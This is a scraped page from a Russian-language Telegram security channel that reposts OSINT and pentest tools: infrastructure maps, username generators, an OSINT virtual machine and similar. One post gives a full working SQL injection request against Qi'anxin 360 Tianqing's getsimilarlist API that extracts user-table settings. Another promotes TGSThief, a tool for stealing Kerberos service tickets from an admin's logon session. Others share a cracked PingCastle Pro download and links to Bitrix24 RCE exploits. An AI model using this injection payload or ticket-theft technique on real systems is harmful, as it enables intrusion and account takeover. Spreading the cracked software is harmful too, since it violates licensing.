C.I.T. Security
8.17K subscribers
2.85K photos
259 videos
4.2K files
4.12K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.iss.one/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Карта инфраструктуры всего мира

Проект OpenInfraMap построен на базе OSM (Open Street Map), только подробнее показывает подземные/наземные линии электропередач и электростанции.

Помимо визуализации он так же показывает их тип, сколько они генерируют и какая компания ими занимается.
🔥1
Получить никнейм из ФИО

BabelStrike – инструмент который сгенерирует множество вариантов никнеймов из имении, фамилии и отчества человека в разных форматах: john.doe, j_doe, doe.john и т.д.

Формат генерации можно изменить.

Вывод скрипта можно запихнуть в sherlock или maigret для проверки его существования в соц. сетях, форумах и прочих сервисах.
Ваше расследование – наглядно

Майндмапы нередко используется в мире бизнеса для визуализации идей и работы с данными.

В мире OSINT’а этот мощный инструмент позволит вам визуализировать ход расследования (представьте стену с фотографиям и красной нитью) для упрощения ориентации в большом количестве данных или для красивой картинки заказчику.
👨🏻‍💻 OffenOsint Virtual Machine.

🖖🏻 Приветствую тебя user_name.

💬 Сегодня мы добавим в наш арсенал полезный образ виртуальной машины, который предназначен для оперативной разведки в открытых источниках. За основу взят iso-образ #Kali, сборка не установочная и импортируется в VirtualBox.

OffenOsint сочетает в себе различные инструменты репозитория Kali Linux для проведения OSINT, полезные фреймворки, полезные скрипты, инструменты для анонимизации своих действий в сети и многое другое...

• Полный список инструментов доступен на GitHub.

• Также, обязательно ознакомься с полезным обзором этой виртуальной машины: https://codeby.net/media/obzor-sborki-osint-dlja-razvedki-v-seti.173/

📌 Дополнительный материал:

OSINT Collection.
OSINT в Telegram.
OSINT в социальных сетях.
Продвинутый курс по Maltego.
OSINT. Инструменты, базы данных, инструкции.
CSI Linux. Дистрибутив для кибер-расследований и OSINT.

‼️
Другую дополнительную информацию ты можешь найти по хэштегу #OSINT . Делись с друзьями, добавляй в избранное и включай уведомления чтобы не пропустить новый материал. Твой S.E.
PingCastle Pro (No Server Side) 3.1.0.1

Down : https://mir.cr/0JECBXGW
Passw : 20231109_1912


Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
Qi'anxin 360 Tianqing get similar list SQL injection vulnerability

GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
🔥 Bitrix24 Multiple Vulnerabilities

Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.

🌐 Details and PoC's:

🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)

#bitrix24 #rce #xss #dos #idor
🔎 TorBot

TorBot - это интеллектуальный инструмент Osint с открытым исходным кодом, разработанный на Python.

Основная цель этого проекта - собрать открытые данные из даркнета и с помощью алгоритмов интеллектуального анализа создать интерактивную древовидную диаграмму.

Ссылка на GitHub

#OSINT #Python
Forwarded from RedTeam brazzers (Миша)
tgsthief.png
185.6 KB
Буквально на днях вышел один интересный проект GIUDA , который позволяет злоупотреблять сессиями еще одним способом! Представим ситуацию, что у нас есть ЛА на машине, на которую изредка ходит ДА. С помощью этого инструмента можно будет, зная лишь идентификатор логон сессии ДА, запросить TGS на любую службу от его имени. Да, даже не нужно знать его пароля, лезть в LSASS, красть токен, внедряться в процесс и тому подобное и прочее.

Достаточно только LUID👀

Казалось бы, все круто, но проект написан на Pascal😳 (паскаль, лол, мы на нем в школе только писали).

Поэтому я принял решение переписать инструмент на C++, добавив пару фишек:
1. Во-первых, никаких десятков запусков (та тулза требовала, чтобы сначала запустить ее от системы, потом второй раз запустить для перечисления LUID, потом с этим LUID снова запустить, уже указав SPN, тьфу.....) . Один запуск, и TGS в кармане. Мой инструмент автоматически повысится до системы, перечислит LUID (ты должен просто отдать нужный номер logon сессии, из которой нужно запросить TGS), а затем ввести SPN. И все. Готово :000
2. Добавил вывод тикета в base64 и опциональный инжект в логон сессию, из которой был запущен инструмент
3. Из-за моих прямых рук часто криво вводил SPN, добавил валидацию SPN по regex. Дополнительно SPN можно валидировать через InitializeSecurityContext , как я это делал в TGT Delegation .


Итак, прошу любить и жаловать! 🥰

https://github.com/MzHmO/TGSThief
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
⚛️ Nuclei AI — Browser Extension

Nuclei AI Browser Extension, built on top of cloud.projectdiscovery.io, simplifies the creation of vulnerability templates, by enabling users to extract vulnerability information from any webpages to quickly and efficiently create nuclei templates, saving valuable time and effort.

🚀 Features

Context Menu Option to Generate Template
HackerOne Report to Nuclei Template Generation
ExploitDB exploit to Nuclei Template Generation
BugCrowd / Intigriti / Synack support (Coming soon)

🔗 https://github.com/projectdiscovery/nuclei-ai-extension

#nuclei #template #generator #chrome #extension
🔥2👍1
Skiff — сервис, предоставляющий услуги:

— Почтового ящика со сквозным шифрованием писем;
— Зашифрованных заметок, документов и календаря;
— Облачного хранения файлов (до 10 GB бесплатно);

У сервиса есть бесплатный и 3 платных тарифа. Самый дорогой — 12$/мес, включает в себя 1 TB хранилища и 15 почтовых алиасов.

#сайт #сервис #приватность
👍1